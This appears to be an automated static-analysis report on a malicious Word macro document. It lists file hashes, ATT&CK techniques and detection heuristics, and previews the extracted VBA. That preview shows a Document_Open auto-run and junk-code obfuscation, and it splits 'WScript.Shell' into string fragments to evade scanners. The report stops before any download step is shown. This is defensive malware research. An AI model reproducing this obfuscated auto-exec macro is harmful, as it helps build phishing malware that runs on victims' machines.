Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 49ea70296051e531…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 243.5 KB
Created: 2019-10-30 07:14:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-08-10
MD5: f9271c67656ca2f338cf0b0e11ad18bf
SHA-1: 0cee69296440a4dc51a202c7ca4fd39a933c7394
SHA-256: 49ea70296051e531201690131eb0ef55869ceccd4f1134309ec54debfd86ec3b
Risk score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is an OOXML document containing a VBA macro with a Document_Open auto-execution subroutine. This macro utilizes obfuscation techniques, including reassembling API names from string literals, to call dangerous functions like Shell() and CreateObject(). The reassembled string "wscRIPt.sHell" strongly suggests the execution of a script, likely to download and run a second-stage payload.

Heuristics (7)

  • VBA project inside OOXML [medium] (5 related findings) OOXML_VBA
    Document contains a VBA project (VBA macros present).
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro source contains a call to Shell().
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    The macro defines a Document_Open auto-execution subroutine.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The macro source contains a call to CreateObject().
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 10442 bytes
SHA-256: 528bdd80d6131e5969344286029d6c2f243cde5272222a320c9103657947994c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()

qnde.v__A_r5w_J_m8n_9Qhg8


End Sub




Attribute VB_Name = "qnde"
Sub v__A_r5w_J_m8n_9Qhg8()
If "Qs_C8G8_c_XY_wKVHiLh98kMp__Pge_Yi2RM_8RZgVQDD7" = "pM8EQLS_TR_nW3_gS868zGT7LIFv_cgV_sMuRRCu_bX9" Then
Dim EUaXR9_RHE_Y2A3__g_1ukemeLE_t_1 As String
ElseIf "MsUrzrqS_ZDD3lx3RX_nYWfCczw2_t_h_NsoVG_NNC_QgWk_qRvbmVRyB" = "GE94yMGYe_e3_V_UqPKTEf_Dv_m7X4j63bD__SYzu2_O__g5l_6__U7k_" Then
Dim t_miJAjWhAfH_QM1UhMdo_ocrKP8dzWd As String
Dim c2IKuGa1Q2W__mbphEjwj_SlS_z8jl2rb_nF___ As String
End If
If "D_UCwjhb_rjPOEj4UXf2lPcGnAodA8Lgf_Vp" = "D4f_tguF9Lcc2_Ira_SxcDXw4_b_V_sEr3oZ1d__d" Then
Dim MGRVBk2oc_UphCAVs_p_os6bNt8Rrz7_NIF7_PrRiQ27 As String
ElseIf "NX_po__WP9xcJz_QlZ6m_RRN7_PRNMUN19DziHm" = "mqYlOTllEIPp_TDx5_uslmo__cZlKlGqTwI5ip_3JP__7g" Then
Dim L3l_HtwYA9_Oiu4APc_iKK_HEE_2XKbeBTFf9_SW35vI3I As String
Dim G9JAh_NLArS4_q5AoWVCEdMAD_doPY1O5_u2DK4Wx_ExeFOo84_vV_zllI As String
End If
If "uXdi6az_946_vSb9O_NXT8sxpUR_2xH_F4ZU3EBn7aGUs5_mI" = "WqtMCxwno2Z_t__lwv13___4ja3pN_uMnvU_Wt__mpCLl" Then
Dim dBP_r6_Ft_Qgzmk5_Pj_CT8p_D_tuEP2wH_ As String
ElseIf "Obje_m_4j_Yg_P_fPbEX_Dj_d3MTduXthgLRUtbS" = "ZMldg5Skh9Ogs5_2h_EOlOyeo9Z_r_" Then
Dim fAvRiz7X684s5v_Bxk_YwrL_S_W_ygTO3 As String
Dim WROuPLJ5__FU3T_Vb_x2HMwmq9XSziOcdyWSsQXO1dmm_iYp As String
End If
iTD_CTKwTd7R4OPqn5hAcMDERomoN_mNN4VQ19vfW_RcLlrhNLKV9gUKF8nXqeXRzi_938zn__cT4j3o6_Q_pGOqY__2KNy1i9lliroOVfM7_AQf_8amDWliILZsx7RsBku57F_DN_e_3RmYsdx = 0
If "TjMWfWj_ek_Pwz_Zomz_6jl_kXAmi_g" = "Yr9EK27_ENw_M_bAZC8RrVss8Bu_V6YT_4z_1xDwor" Then
Dim xhvdvc6ACVBDO_8EG__zkHxS_RGW_k8_mAg_7TOG_Ur_ As String
ElseIf "Hyew_lg_py_fsSZSLX1bW_aOUwHwty" = "oEYu_CwSRU_3Tx2_Rc354kdFeGNEQHTtJz_1_8ILf2_UXcglVTTn" Then
Dim x4_kIF3yh___IicoA4SJfO_e_r_ilr7wpzV6_Fwq As String
Dim OW7z7TD4_7UY_SMY2XbaDIBy_KKSCgjt_k4_QBhnc_ As String
End If
If "enLXvLb6_fmLb_K_uk_tqVLkROXE_ozx7_" = "mWceX81Fc__t_xwIP6dsN_Rj_WxMyNoxOTSwdEB_3a3HegFjRwO3JDtd_" Then
Dim Y__dQDNGUnTAn_sSzwE__XGC5_8ud_jxqlp__N_n As String
ElseIf "MBaEQ_E_zN6O6vAs5iOFbmI_eH_ShQalZDrK" = "o8c2skmvmYtzoQ_otXRj2Wi__ubXwJxr" Then
Dim n_7_WWz9WP_XBnFLu1_u_SHNSu7_D9Sk_uAM_iM_bjU_ck4_KB_R As String
Dim v76KuhlkYptW7TVPm2DBd_HW7Bur1zw_8Ax_ynbY6lauz7__D As String
End If
If "dSR8xwunYNhw3sh3rY7eQZ8PnE2YWf9_lcMVU__B_PPP4k_2" = "X_bw_U_Jh5LG2Nd_OV_WoOtb__gV_BAfeYZ3_pJ_Ss" Then
Dim aGq_W_PZmUqTR_PAu2weGU5okSwj_iB__6xbt2me_bYdx As String
ElseIf "Qb_5QCwa_L_W_DoY_IfPVKxE2EHYo5P" = "aLV_2mt7FTsErUiQQ_VKHtj_n3_B5Nv_5_5qrggOXi__ahWWez_lY_hqkOT" Then
Dim kg_2gjJhZ1isU_vijid_Vef_F_izaD_RChn1gGT As String
Dim Nx6nGNFSI9__uNb_A7kVAS_LuGfvR5_SDlqgh2w23Egb__g As String
End If
xqu1oXFAJ_21WE7FPaI1HVCi6F__m_mYO_qhYU_D__QKIe1fh_mBBSURc_4XV_MEURbOWNq4Y_s__1PQOUYgQaM5kO_Mabr9s_z1_a_IOrl_iJMkuc_Ahpx3_fn_ISS7LtR = "ws" & "cR" & "IPt." & "sHell"
If "x_hzie714rj2AqT_M7mw_g4W__sctudDqjrpt" = "RwGuvy79v_YDIdSEXG__rYvS__DU_P8mGHez" Then
Dim fLt_Z_Mh_fb9ua_ZeiM2AwomkaxVBu6 As String
ElseIf "bi_V_ji_DPYfDjiDX_g5lzsg_T8I1VGiZ9H29_X9mpuWE_V1EGmmO_" = "MlzdOkkOJr_y_DRpESigG5_KQA7__irdJUle_UnvNMV_OP_HYX_I_qwQhdB" Then
Dim OndKkAcejavnsovI4Y_6_8ngfgXZcgK7XHN_s_t_u As String
Dim tPpltHdGW32gg_P96o_b___FyEZPnZ1n8_Fh84uN3I As String
End If
If "mRP1_8_vMpYrrMZwerCb7_ChV4r__3ois6PwXNRRfmc" = "XRWKW_Ffop_jDrUCF_tTAz8v7lOFOu6" Then
Dim IYF__VWc4m_3_wohp2EBY3_6hSkNur9F4ty As String
ElseIf "hQqsbyq1769G_hN_iVOOIait_rBm28H7di_ZWS6_R" = "jWl_q_k_KMYuo_r6jtl_88m_mSZwlEZL7CzB_" Then
Dim A__vm5Xr4ArZs_PN_ktjRMiwS_vCwbFexgti__Kqc4YZ_B As String
Dim VN5i_EQWilTDRg_J5QsBl_QpM5O__Wx_sGhXHCV_CP7_ As String
End If
If "EvsmhI9_q1YK6DL_yNPBxKT_9j_q5q8L" = "CIaZBlTxXpQ1qMa_1LBy9uI4Rhn7GHB92C_lmv7C4bn_3c" Then
Dim Sl_7yhe_LRAg_d8VgEcR9dExP_O94W__AxD_yIRdTrzol_nRDW5XdacxV As String
ElseIf "IgtIeEyJxfIO6gMw98FnZBJQ6tVbigXKPde" = "lgJxc_TwYT_HzgkecM_6_LSMu
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 31232 bytes
SHA-256: 83a8911e30c76cc37fccb30ae4071efc0bfa7a64178c6267a4d25733443f9eca